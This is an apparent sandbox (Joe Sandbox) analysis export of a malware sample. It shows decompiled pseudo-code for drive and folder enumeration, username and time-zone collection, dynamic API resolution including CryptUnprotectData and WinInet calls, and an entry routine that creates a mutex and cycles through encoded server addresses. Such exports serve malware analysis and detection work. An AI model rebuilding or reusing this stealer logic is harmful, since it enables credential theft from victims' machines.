Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Local$Free$lstrcpyn$Alloclstrlen$ByteCharGlobalInfoMultiSystemWidewsprintf
String ID:
API String ID: 1885324996-0
Opcode ID: 88facd3d2ccba2b791435520d18aea57aba3ddc4eac04c95bc4be645a3463a6d
Instruction ID: bf3e6bb46204bb3e37d09e038ca25be6bf8868f14e997d98ff16e67e74bb5e03
Opcode Fuzzy Hash: 88facd3d2ccba2b791435520d18aea57aba3ddc4eac04c95bc4be645a3463a6d
Instruction Fuzzy Hash: 0D4192B1A002149FDB04CF69DDC496ABBF8EB48320B14857AFE09FB355D6749D50CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040ABD8 Relevance: 10.7, APIs: 7, Instructions: 190
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E0040ABD8(intOrPtr __ecx, short __edx) {
				intOrPtr _v20;
				short _v24;
				short _v28;
				short _v30;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr* _v44;
				WCHAR* _v48;
				char _v52;
				long _v56;
				void* _v60;
				intOrPtr _v68;
				char _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v108;
				void* _v112;
				short* _v136;
				WCHAR* _v140;
				char _v152;
				intOrPtr _v156;
				void* _t44;
				long _t47;
				signed int _t49;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				void* _t54;
				char _t55;
				intOrPtr _t57;
				intOrPtr* _t69;
				void* _t74;
				void* _t77;
				void* _t78;
				intOrPtr _t87;
				WCHAR* _t94;
				void* _t98;
				long _t102;
				void* _t105;
				WCHAR* _t107;
				void* _t110;
				short* _t111;
				void* _t112;
				signed int _t115;
				void* _t118;
				signed int _t119;
				signed int _t120;
				void* _t123;

				_v44 = 0;
				_v24 = __edx;
				_v20 = __ecx;
				_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x1000, _t105, _t112, _t77);
				_t44 = E0040AE06(0, _t78,  &_v52, __ecx, 0, 0, __edx, 0); // executed
				_t123 = (_t120 & 0xfffffff8) - 0x2c + 0x14;
				if(_t44 >= 0) {
					_t107 =  *((intOrPtr*)( *0x40e044))(0x40, 0x410);
					_v48 = _t107;
					_t47 = GetLogicalDriveStringsW(0x208, _t107); // executed
					_v56 = _t47;
					if(_t47 == 0) {
						L10:
						if(_v60 > 0) {
							_t51 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							_t52 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							_t98 = 0x10;
							_t53 = E0040A05F(_t51, _t98);
							_v52 = _t53;
							_t54 =  *((intOrPtr*)( *0x40e13c))(_t52,  *0x40e210);
							_t110 = _v60;
							_t55 = E0040A503(_t54, _t110);
							_t87 =  *0x40e204; // 0x4e5e00
							_v72 = _t55;
							_v80 = _t87;
							_v76 = 0;
							_t57 = E00408619( &_v72);
							_v68 = _t57;
							_t118 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t110, 0xffffffff, 0, 0, 0, 0);
							if(0 != 0) {
								 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t110, 0xffffffff, _t118, 0, 0, 0);
								if(0 != 0) {
									E00407EDB(_v136, _t118, 0, 0, _v156, _t78, _v140,  &_v152);
								}
							}
							LocalFree(_t118);
							LocalFree(_v108);
							LocalFree(_v112);
							LocalFree(_t110);
						}
						_t115 = 1;
						L16:
						LocalFree(_t78);
						_t49 = _t115;
						L17:
						return _t49;
					}
					_t119 = 0;
					if(_t47 == 0) {
						goto L10;
					}
					_t94 = _v48;
					_t111 =  &(_t107[0xfffffffffffffffe]);
					_t102 = _v56;
					_t69 = _t94 - 6;
					_v44 = _t69;
					do {
						if(_t119 <= 0) {
							goto L9;
						}
						_t102 = _v56;
						if(_t94[_t119] != 0) {
							goto L9;
						}
						_v32 =  *_t69;
						_v30 =  *_t111;
						_v28 = 0;
						_v24 = 0;
						_t74 = E0040AE06( &_v32, _t78,  &_v60, _v36,  &_v32, _t73, _v40, 0); // executed
						_t123 = _t123 + 0x14;
						if(_t74 < 0) {
							_t115 = _t119 | 0xffffffff;
							goto L16;
						}
						_t119 = _t119 + 1;
						_t94 = _v48;
						_t69 = _v44 + 2;
						_t102 = _v56;
						_t111 =  &(_t111[1]);
						L9:
						_t119 = _t119 + 3;
						_t69 = _t69 + 6;
						_t111 =  &(_t111[3]);
						_v44 = _t69;
					} while (_t119 < _t102);
					goto L10;
				}
				_t49 = LocalFree(_t78) | 0xffffffff;
				goto L17;
			}

0x0040abef
0x0040abfa
0x0040abfe
0x0040ac04
0x0040ac13
0x0040ac18
0x0040ac1d
0x0040ac42
0x0040ac4a
0x0040ac4e
0x0040ac50
0x0040ac56
0x0040acee
0x0040acf3
0x0040ad05
0x0040ad16
0x0040ad1a
0x0040ad1f
0x0040ad31
0x0040ad35
0x0040ad37
0x0040ad3f
0x0040ad44
0x0040ad4a
0x0040ad50
0x0040ad58
0x0040ad5c
0x0040ad6e
0x0040ad7a
0x0040ad8b
0x0040ad8f
0x0040ada6
0x0040adaa
0x0040adc4
0x0040adc9
0x0040adaa
0x0040adcd
0x0040add7
0x0040ade1
0x0040ade8
0x0040ade8
0x0040adf0
0x0040adf1
0x0040adf2
0x0040adf8
0x0040adfa
0x0040ae00
0x0040ae00
0x0040ac5e
0x0040ac62
0x00000000
0x00000000
0x0040ac68
0x0040ac6c
0x0040ac6f
0x0040ac73
0x0040ac76
0x0040ac7a
0x0040ac7c
0x00000000
0x00000000
0x0040ac84
0x0040ac88
0x00000000
0x00000000
0x0040ac91
0x0040ac9b
0x0040aca7
0x0040acab
0x0040acba
0x0040acbf
0x0040acc4
0x0040ae01
0x00000000
0x0040ae01
0x0040acce
0x0040accf
0x0040acd3
0x0040acd6
0x0040acda
0x0040acdd
0x0040acdd
0x0040ace0
0x0040ace3
0x0040ace6
0x0040acea
0x00000000
0x0040ac7a
0x0040ac26
0x00000000

APIs

LocalFree.KERNEL32(00000000), ref: 0040AC20
GetLogicalDriveStringsW.KERNEL32(00000208,00000000), ref: 0040AC4E

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: DriveFreeLocalLogicalStrings
String ID:
API String ID: 1768043713-0
Opcode ID: 99c62c4b5ef8cfe9a5f11bf27ef9e755505db6d71708b7bfda759fd71d10aa15
Instruction ID: 0df1316ab9a5c1427916cb56fbbb1f674cf856c690d2ecf6bb3ed985b7a3ed22
Opcode Fuzzy Hash: 99c62c4b5ef8cfe9a5f11bf27ef9e755505db6d71708b7bfda759fd71d10aa15
Instruction Fuzzy Hash: AF517EB1604311AFE304DB26DD44A2B76E9EBC8714F004A2EF959E72D0DA749D118BAB

Uniqueness

Uniqueness Score: -1.00%

Function 0040633E Relevance: 7.6, APIs: 5, Instructions: 103
fileCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040633E(WCHAR* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v524;
				char _v536;
				char _v538;
				short _v540;
				char _v552;
				char _v1076;
				intOrPtr _v1084;
				struct _WIN32_FIND_DATAW _v1132;
				short* _v1148;
				void* __ebx;
				void* __esi;
				void* _t25;
				void* _t29;
				int _t31;
				void* _t34;
				signed int _t36;
				WCHAR* _t49;
				void* _t74;
				intOrPtr _t76;
				void* _t78;

				_t76 = _a8;
				_t49 = __ecx;
				_v1132.ftLastAccessTime.dwFileAttributes = __edx;
				if(_t76 > 2) {
					L10:
					_t25 = 1;
					L11:
					return _t25;
				}
				_push(__ecx);
				E004018E9( &_v524, 0x104, __ecx, __ecx);
				E0040188C(__ecx,  &_v536, 0x104, _t76,  *0x40e1d0);
				_t29 = FindFirstFileW( &_v540,  &_v1132); // executed
				_t74 = _t29;
				if(_t74 != 0xffffffff) {
					do {
						__eflags = _v1132.ftLastAccessTime.dwFileAttributes & 0x00000010;
						if((_v1132.ftLastAccessTime.dwFileAttributes & 0x00000010) != 0) {
							__eflags =  *((intOrPtr*)( *0x40e0a0))( &_v1076,  *0x40e394);
							if(__eflags != 0) {
								_t34 = 0x2e;
								__eflags = _t34 - _v1084;
								if(_t34 != _v1084) {
									_t36 =  *((intOrPtr*)( *0x40e08c))(_t49);
									_t59 =  &_v538 + _t36 * 2;
									_push( &_v538 + _t36 * 2);
									E004018E9( &_v538 + _t36 * 2, 0x104, _t59,  &(_v1132.cFileName));
									_t22 = _t76 + 1; // 0x407b87
									E0040633E( &_v552, _v1148, _a4, _t22); // executed
								}
							} else {
								_t78 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								PathCombineW(_t78, _t49,  &(_v1132.dwReserved1));
								E00406725(_t78, _v1148, __eflags, _a4);
								__eflags = _t78;
								if(_t78 != 0) {
									LocalFree(_t78);
								}
								_t76 = _a8;
							}
						}
						_t31 = FindNextFileW(_t74,  &(_v1132.ftLastAccessTime)); // executed
						__eflags = _t31;
					} while (_t31 != 0);
					FindClose(_t74);
					goto L10;
				} else {
					_t25 = 0;
					goto L11;
				}
			}

0x0040634c
0x0040634f
0x00406351
0x00406359
0x00406417
0x00406417
0x00406419
0x0040641f
0x0040641f
0x0040635f
0x00406370
0x00406384
0x0040639b
0x0040639d
0x004063a2
0x004063a8
0x004063a8
0x004063ad
0x004063c1
0x004063c3
0x00406422
0x00406423
0x00406428
0x00406430
0x0040643e
0x00406441
0x00406448
0x00406451
0x0040645f
0x00406465
0x004063c5
0x004063d3
0x004063dc
0x004063eb
0x004063f1
0x004063f3
0x004063f6
0x004063f6
0x004063fc
0x004063fc
0x004063c3
0x0040640a
0x0040640c
0x0040640c
0x00406411
0x00000000
0x004063a4
0x004063a4
0x00000000
0x004063a4

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,00000000,?,00000000), ref: 0040639B
PathCombineW.SHLWAPI(00000000,?,?), ref: 004063DC
LocalFree.KERNEL32(00000000), ref: 004063F6
FindNextFileW.KERNELBASE(00000000,00000010), ref: 0040640A
FindClose.KERNEL32(00000000), ref: 00406411

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: Find$File$CloseCombineFirstFreeLocalNextPath
String ID:
API String ID: 3818457336-0
Opcode ID: eaed1e93e5892b48d27f800aebad6855d1cc82eb2c9bf3f724fc16a94e156a62
Instruction ID: a2e91296d065ef1b0a06dad1807512ccc5f2754619bc6de4979fdad6ab57a53e
Opcode Fuzzy Hash: eaed1e93e5892b48d27f800aebad6855d1cc82eb2c9bf3f724fc16a94e156a62
Instruction Fuzzy Hash: CE310272104316ABD714EB54DC80DBB73A8EB84314F00493EFD56A32E0DB79A919DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040919C Relevance: 4.5, APIs: 3, Instructions: 39
timeCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E0040919C(intOrPtr* _a4) {
				struct _TIME_ZONE_INFORMATION _v176;
				void* _t8;
				void* _t20;
				intOrPtr* _t21;

				GetTimeZoneInformation( &_v176); // executed
				_t20 =  *((intOrPtr*)( *0x40e044))(0x40, 0x400);
				_push( ~(_v176.Bias));
				_t8 = 0x2b;
				_t15 =  >  ? _t8 : 0;
				wsprintfW(_t20,  *0x40e2f4,  >  ? _t8 : 0);
				_t21 = _a4;
				 *_t21 = E0040A503( *_t21, _t20);
				LocalFree(_t20);
				return 1;
			}

0x004091ae
0x004091cc
0x004091ce
0x004091d1
0x004091d4
0x004091df
0x004091e5
0x004091f5
0x004091f7
0x00409203

APIs

GetTimeZoneInformation.KERNEL32(?,-00000014,74CB5850), ref: 004091AE
wsprintfW.USER32 ref: 004091DF

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: LocalAlloc.KERNEL32(00000040,00000000,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A533
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00000000), ref: 004091F7

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: FreeLocallstrlen$AllocGlobalInformationTimeZonewsprintf
String ID:
API String ID: 3282131229-0
Opcode ID: 0c261c65a445bae399a99a2b287ec62879060ec21ec3ab2ad3353035a3fa855c
Instruction ID: 22640a5e82af922e2c0672ad49884a71deb67002d2383c126f26ce4509f9bf47
Opcode Fuzzy Hash: 0c261c65a445bae399a99a2b287ec62879060ec21ec3ab2ad3353035a3fa855c
Instruction Fuzzy Hash: 2FF096B1700210AFF714AB6AED05F6BB7F9EFC9710F008839FA46E7150D6B499118A69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A672 Relevance: 1.5, APIs: 1, Instructions: 18
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040A672(void* __ecx) {
				long _v8;
				void* _t9;
				WCHAR* _t10;

				_v8 = 0x101;
				_t10 =  *((intOrPtr*)( *0x40e044))(0x40, 0x202, _t9, __ecx);
				GetUserNameW(_t10,  &_v8); // executed
				return _t10;
			}

0x0040a683
0x0040a68c
0x0040a693
0x0040a69d

APIs

GetUserNameW.ADVAPI32(00000000,00000101), ref: 0040A693

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: d1904d6b7f39e67c7bb99d3a0e0e7b9e3097bfc240a7c331603b2b932608badc
Instruction ID: 829893f7f7874bcec709fc38dd40a9501cb2b48959beeca35c44734de89a3163
Opcode Fuzzy Hash: d1904d6b7f39e67c7bb99d3a0e0e7b9e3097bfc240a7c331603b2b932608badc
Instruction Fuzzy Hash: 13D05EB2200224BBD70097999E09ECAB6ACDB09750F000161BB15E7281D6B49E0087E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040100B Relevance: 222.8, APIs: 18, Strings: 109, Instructions: 531
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(kernel32.dll,?,?,00407780), ref: 00401016
GetProcAddress.KERNEL32(00000000,LoadLibraryW), ref: 00401036
LoadLibraryW.KERNEL32(Shlwapi.dll,?,?,?,?,?,00407780), ref: 00401042
LoadLibraryW.KERNEL32(Ole32.dll,?,?,?,?,?,00407780), ref: 00401051
LoadLibraryW.KERNEL32(WinInet.dll,?,?,?,?,?,00407780), ref: 00401061
LoadLibraryW.KERNEL32(Crypt32.dll,?,?,?,?,?,00407780), ref: 00401091
LoadLibraryW.KERNEL32(Shell32.dll,?,?,?,?,?,00407780), ref: 004010A1
LoadLibraryW.KERNEL32(Bcrypt.dll,?,?,?,?,?,00407780), ref: 004010AA
GetProcAddress.KERNEL32(?,GetProcAddress), ref: 004010B8
GetProcAddress.KERNEL32(?,HeapFree), ref: 00401297
GetProcAddress.KERNEL32(?,Sleep), ref: 00401369
GetProcAddress.KERNEL32(00000000,StrToIntA), ref: 004014CB
GetProcAddress.KERNEL32(00000000,StrToInt64ExW), ref: 004014E9
GetProcAddress.KERNEL32(?,CharUpperW), ref: 004015C1
GetProcAddress.KERNEL32(?,InternetOpenUrlA), ref: 004016F6
GetProcAddress.KERNEL32(?,InternetReadFileExW), ref: 00401714
GetProcAddress.KERNEL32(?,HttpQueryInfoA), ref: 00401768
GetProcAddress.KERNEL32(?,HttpQueryInfoW), ref: 00401774

Strings

GetDesktopWindow, xrefs: 004015F8
HttpQueryInfoA, xrefs: 0040175D
GetUserNameW, xrefs: 00401535
WideCharToMultiByte, xrefs: 004013FA
SystemFunction036, xrefs: 004015A1
Advapi32.dll, xrefs: 00401069
StrStrW, xrefs: 0040149C
StrToInt64ExW, xrefs: 004014DE
GetProcAddress, xrefs: 004010B0
FindFirstFileW, xrefs: 00401256
Shell32.dll, xrefs: 00401099
CryptStringToBinaryW, xrefs: 0040167C
GetSystemInfo, xrefs: 00401152
GetLastError, xrefs: 00401100
CryptStringToBinaryA, xrefs: 0040166A
WinInet.dll, xrefs: 00401059
GlobalAlloc, xrefs: 004011A2
GetCurrentProcess, xrefs: 004010BD
Crypt32.dll, xrefs: 00401089
DuplicateTokenEx, xrefs: 00401511
OpenMutexW, xrefs: 004012AA
CryptUnprotectData, xrefs: 004016A0
HttpOpenRequestW, xrefs: 00401739
StrStrIW, xrefs: 004014B8
InternetReadFile, xrefs: 0040171F
LocalFree, xrefs: 004012CE
Shlwapi.dll, xrefs: 00401038
GetSystemMetrics, xrefs: 0040160A
OpenProcess, xrefs: 004012BC
GetEnvironmentVariableW, xrefs: 004010CA
ConvertSidToStringSidW, xrefs: 004014F7
RegCloseKey, xrefs: 00401559
GetClientRect, xrefs: 004015DE
CopyFileW, xrefs: 0040120E
ReleaseDC, xrefs: 0040161C
InternetOpenW, xrefs: 004016C7
CharUpperW, xrefs: 004015B6
wsprintfW, xrefs: 0040162E
CreateFileW, xrefs: 004011EA
SetEnvironmentVariableW, xrefs: 0040134C
lstrlenW, xrefs: 004013D6
lstrcmpW, xrefs: 004013B2
LocalAlloc, xrefs: 004012E0
GetFileSize, xrefs: 004010DC
HttpQueryInfoW, xrefs: 0040176E
Process32Next, xrefs: 00401328
FreeLibrary, xrefs: 00401232
GetDriveTypeW, xrefs: 004010EE
SetCurrentDirectoryW, xrefs: 0040133A
GetUserDefaultLocaleName, xrefs: 0040117E
EnumDisplayDevicesW, xrefs: 004015CC
ReadFile, xrefs: 00401304
StrToIntA, xrefs: 004014C0
User32.dll, xrefs: 00401079
GetModuleFileNameW, xrefs: 00401136
CreateToolhelp32Snapshot, xrefs: 0040127A
Sleep, xrefs: 0040135E
lstrcmpiW, xrefs: 00401398
Process32First, xrefs: 00401316
CreateMutexW, xrefs: 004011FC
WriteFile, xrefs: 004013E8
SHGetSpecialFolderPathW, xrefs: 00401430
CoInitialize, xrefs: 00401643
CryptBinaryToStringW, xrefs: 0040168E
OpenProcessToken, xrefs: 00401547
ShellExecuteW, xrefs: 0040140C
lstrcpynA, xrefs: 0040137C
GetLocaleInfoW, xrefs: 00401112
lstrlenA, xrefs: 004013C4
RegOpenKeyExW, xrefs: 0040157D
kernel32.dll, xrefs: 00401011
Ole32.dll, xrefs: 0040104C
InternetOpenUrlW, xrefs: 00401701
GetLogicalDriveStringsW, xrefs: 00401124
GetSystemWow64DirectoryW, xrefs: 0040115A
SHGetFolderPathW, xrefs: 0040141E
MultiByteToWideChar, xrefs: 004012F2
GetTimeZoneInformation, xrefs: 00401190
InternetSetOptionW, xrefs: 004016D9
StrCpyW, xrefs: 00401478
Bcrypt.dll, xrefs: 004010A3
GlobalFree, xrefs: 004011B4
ExitProcess, xrefs: 004012A2
GetUserDefaultLCID, xrefs: 0040116C
CreateProcessWithTokenW, xrefs: 004014FF
CoCreateInstance, xrefs: 00401655
StrStrA, xrefs: 0040148A
FindClose, xrefs: 00401244
CloseHandle, xrefs: 004011D8
StrToIntW, xrefs: 004014D6
LoadLibraryW, xrefs: 00401030
PathCombineW, xrefs: 00401454
RegEnumKeyExW, xrefs: 0040156B
HttpSendRequestW, xrefs: 0040174B
lstrcpyA, xrefs: 00401374
GetDC, xrefs: 004015E6
GlobalMemoryStatusEx, xrefs: 004011C6
InternetOpenUrlA, xrefs: 004016EB
DeleteFileW, xrefs: 00401220
StrRChrW, xrefs: 00401466
PathMatchSpecW, xrefs: 00401442
GetTokenInformation, xrefs: 00401523
InternetCloseHandle, xrefs: 00401727
FindNextFileW, xrefs: 00401272
lstrcmpA, xrefs: 004013A0
InternetReadFileExW, xrefs: 00401709
RegQueryValueExW, xrefs: 0040158F
HeapFree, xrefs: 0040128C
InternetConnectW, xrefs: 004016B5

Memory Dump Source

Source File: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000014.00000002.440168036.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_400000_F0geI.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: Advapi32.dll$Bcrypt.dll$CharUpperW$CloseHandle$CoCreateInstance$CoInitialize$ConvertSidToStringSidW$CopyFileW$CreateFileW$CreateMutexW$CreateProcessWithTokenW$CreateToolhelp32Snapshot$Crypt32.dll$CryptBinaryToStringW$CryptStringToBinaryA$CryptStringToBinaryW$CryptUnprotectData$DeleteFileW$DuplicateTokenEx$EnumDisplayDevicesW$ExitProcess$FindClose$FindFirstFileW$FindNextFileW$FreeLibrary$GetClientRect$GetCurrentProcess$GetDC$GetDesktopWindow$GetDriveTypeW$GetEnvironmentVariableW$GetFileSize$GetLastError$GetLocaleInfoW$GetLogicalDriveStringsW$GetModuleFileNameW$GetProcAddress$GetSystemInfo$GetSystemMetrics$GetSystemWow64DirectoryW$GetTimeZoneInformation$GetTokenInformation$GetUserDefaultLCID$GetUserDefaultLocaleName$GetUserNameW$GlobalAlloc$GlobalFree$GlobalMemoryStatusEx$HeapFree$HttpOpenRequestW$HttpQueryInfoA$HttpQueryInfoW$HttpSendRequestW$InternetCloseHandle$InternetConnectW$InternetOpenUrlA$InternetOpenUrlW$InternetOpenW$InternetReadFile$InternetReadFileExW$InternetSetOptionW$LoadLibraryW$LocalAlloc$LocalFree$MultiByteToWideChar$Ole32.dll$OpenMutexW$OpenProcess$OpenProcessToken$PathCombineW$PathMatchSpecW$Process32First$Process32Next$ReadFile$RegCloseKey$RegEnumKeyExW$RegOpenKeyExW$RegQueryValueExW$ReleaseDC$SHGetFolderPathW$SHGetSpecialFolderPathW$SetCurrentDirectoryW$SetEnvironmentVariableW$Shell32.dll$ShellExecuteW$Shlwapi.dll$Sleep$StrCpyW$StrRChrW$StrStrA$StrStrIW$StrStrW$StrToInt64ExW$StrToIntA$StrToIntW$SystemFunction036$User32.dll$WideCharToMultiByte$WinInet.dll$WriteFile$kernel32.dll$lstrcmpA$lstrcmpW$lstrcmpiW$lstrcpyA$lstrcpynA$lstrlenA$lstrlenW$wsprintfW
API String ID: 2238633743-713005165
Opcode ID: e028293d92a6d1446fa316ab8758502f4985f86e5f7caba5ca57395c6088599a
Instruction ID: 478e95b91b71f65d022eb20dd3102177344006f4c0d5f92c9651a9cba786d8dc
Opcode Fuzzy Hash: e028293d92a6d1446fa316ab8758502f4985f86e5f7caba5ca57395c6088599a
Instruction Fuzzy Hash: 99125671645220EFD340DFBAEFC1E6937E8AB497003105D36B624F72A1D7B899218B5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040776F Relevance: 73.9, APIs: 34, Strings: 8, Instructions: 395
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 63%

			_entry_() {
				WCHAR* _v8;
				void* _v12;
				void* _v16;
				WCHAR* _v20;
				WCHAR* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				char _v32;
				struct HINSTANCE__* _v36;
				struct _SECURITY_ATTRIBUTES* _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				char _v236;
				void* _t68;
				void* _t71;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t74;
				char _t77;
				char _t78;
				WCHAR* _t79;
				WCHAR* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				void* _t85;
				void* _t87;
				signed int _t95;
				void* _t99;
				void* _t100;
				void* _t113;
				void* _t117;
				void* _t119;
				void* _t123;
				void* _t124;
				void* _t125;
				WCHAR* _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				struct HINSTANCE__* _t140;
				struct HINSTANCE__* _t142;
				struct HINSTANCE__* _t156;
				struct HINSTANCE__* _t159;
				void* _t166;
				void* _t181;
				void* _t182;
				char* _t184;
				intOrPtr _t236;
				intOrPtr _t238;
				intOrPtr _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				intOrPtr _t246;
				intOrPtr _t247;
				void* _t258;
				void* _t259;
				WCHAR* _t260;
				void* _t263;
				void* _t264;
				signed int _t265;
				void* _t268;
				struct HINSTANCE__* _t269;
				void* _t271;
				void* _t272;
				void* _t273;
				intOrPtr* _t276;
				void* _t277;
				intOrPtr* _t278;

				E0040100B(); // executed
				 *0x40e064(0); // executed
				_v24 = E0040A4C2("76426c3f362f5a47a469f0e9d8bc3eef");
				E00404027();
				_t184 =  *0x40e04c;
				_t68 =  *_t184( &_v236, 0x55); // executed
				if(_t68 == 0) {
					L4:
					_t260 = L"iqroq5112542785672901323";
					_push(_t260);
					_push(0);
					_push(0x1f0001);
					if( *((intOrPtr*)( *0x40e168))() != 0) {
						ExitProcess(2); // executed
					}
					CreateMutexW(0, 0, _t260); // executed
					_t71 = E0040A0BE(); // executed
					if(_t71 != 0) {
						E0040A1FE();
					}
					_t72 = E00409FD3(0x40d998);
					_t73 = E00409FD3("                                                                ");
					_t74 = E00409FD3("                                                                ");
					_v64 = _t72;
					_v60 = _t73;
					_v56 = _t74;
					_v52 = E00409FD3("                                                                ");
					_v48 = E00409FD3("                                                                ");
					_t77 =  *0x40e314; // 0x505978
					_v32 = _t77;
					_t78 =  *0x40e204; // 0x4e5e00
					_v28 = 0;
					_v44 = _t78;
					_v40 = 0;
					_t79 = E00408619( &_v32);
					 *_t278 = 0x1000;
					_v8 = _t79;
					_t80 =  *((intOrPtr*)( *0x40e044))(0x40, _t184);
					_v20 = _t80;
					_t81 =  *((intOrPtr*)( *0x40e044))(0x40, 0x618);
					_t82 = E0040A5FA(); // executed
					_t258 = _t82; // executed
					_t83 = E0040A672( *0x40e044); // executed
					_t181 = _t83;
					_t85 = E0040A503( *((intOrPtr*)( *0x40e13c))(_t81,  *0x40e348), _t258);
					_t236 =  *0x40e20c; // 0x4e5dc0
					_t87 = E0040A503(E0040A503(_t85, _t236), _t181);
					_t238 =  *0x40e308; // 0x505bd0
					_t263 = E0040A503(E0040A503(_t87, _t238), _v24);
					_v16 =  *((intOrPtr*)( *0x40e13c))(_v20, _t263);
					LocalFree(_t258);
					LocalFree(_t181);
					LocalFree(_t263);
					_t182 =  *((intOrPtr*)( *0x40e044))(0x40, 0x800);
					_t95 = 0;
					_v12 = 0;
					while(1) {
						_t264 = E0040A4C2( *((intOrPtr*)(_t277 + _t95 * 4 - 0x3c)));
						_push(_t264);
						if( *((short*)(_t264 +  *((intOrPtr*)( *0x40e08c))() * 2 - 2)) != 0x2f) {
							_t264 = E0040A503(_t264, "/");
						}
						_t99 = E00407C62(_t264, _v16, _v8,  &_v44); // executed
						_t278 = _t278 + 0xc;
						_t259 = _t99;
						_t100 =  *((intOrPtr*)( *0x40e08c))(_t259);
						_push(_t264);
						if(_t100 >= 0x40) {
							break;
						}
						LocalFree();
						if(_t259 == 0) {
							LocalFree(_t259);
						}
						_t95 = _v12 + 1;
						_v12 = _t95;
						if(_t95 < 5) {
							continue;
						} else {
							L18:
							LocalFree(_v8);
							LocalFree(_v16);
							_v8 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
							E0040A24A( &_v8);
							if(_t259 == 0) {
								L38:
								LocalFree(_v8);
								LocalFree(_t182);
								ExitProcess(0);
							}
							E0040864C(_t259, _v8); // executed
							_t265 = 0;
							_t113 =  *((intOrPtr*)( *0x40e18c))(_t259,  *0x40e418);
							if(_t113 == 0) {
								L21:
								ExitProcess(0xffffffff);
							}
							_t265 = _t113 - _t259 >> 1;
							_v12 =  *((intOrPtr*)( *0x40e044))(0x40, 0x100);
							_t117 =  *((intOrPtr*)( *0x40e08c))(_t259);
							_t37 = _t265 + 6; // 0x6
							_t119 = E0040A3E4(_t259,  &_v12, _t37, _t117); // executed
							if(_t119 != 0) {
								_t182 = E0040A503(_t182, _v12);
								LocalFree(_v12);
								_t123 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t124 =  *((intOrPtr*)( *0x40e13c))(_t123, _v8);
								_t243 =  *0x40e258; // 0x4e5d00
								_t125 = E0040A503(_t124, _t243);
								_t244 =  *0x40e370; // 0x4fe660
								_t126 = E0040A503(_t125, _t244);
								_v20 = _t126;
								_t127 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
								_t128 =  *((intOrPtr*)( *0x40e13c))(_t127, _v8);
								_t245 =  *0x40e258; // 0x4e5d00
								_t129 = E0040A503(_t128, _t245);
								_t246 =  *0x40e454; // 0x505c90
								_v24 = E0040A503(_t129, _t246);
								SetCurrentDirectoryW(_v8); // executed
								GetEnvironmentVariableW( *0x40e2e0,  *((intOrPtr*)( *0x40e044))(0x40, 0x5000), 0x2800);
